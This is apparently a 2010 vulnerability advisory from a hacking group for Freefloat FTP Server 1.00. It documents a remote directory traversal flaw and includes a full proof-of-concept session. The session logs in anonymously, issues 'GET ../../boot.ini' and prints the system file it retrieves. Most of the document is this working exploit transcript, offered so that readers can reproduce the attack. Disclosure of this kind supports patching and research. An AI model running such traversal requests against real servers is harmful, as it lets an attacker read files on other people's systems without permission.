# _ ____ __ __ ___ # (_)____ _ __/ __ \/ /_____ ____/ / _/_/ | # / // __ \ | / / / / / //_/ _ \/ __ / / / / / # / // / / / |/ / /_/ / ,< / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # Freefloat FTP Server is vulnerable for a path traversal, the following will explain you how to read files # The vulnerability allows an unprivileged attacker to read files whom he has no permissions to. # The vulnerable FTP command are: # * GET - Read File #----------------------------------- # Vulnerability Title: Freefloat FTP Server v1.00 Remote Directory Traversal Vulnerability # Date: 06/12/2010 # Author: Pr0T3cT10n # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Affected Version: 1.00 # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL ### C:\Documents and Settings\Admin>ftp 127.0.0.1 Connected to 127.0.0.1. 220 FreeFloat Ftp Server (Version 1.00). User (127.0.0.1:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp> GET ../../boot.ini 200 PORT command successful. 150 Opening BINARY mode data connection for \boot.ini(211 bytes). 226 Transfer complete. ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec. ftp> bye 221 Goodbye C:\Documents and Settings\Admin>type boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect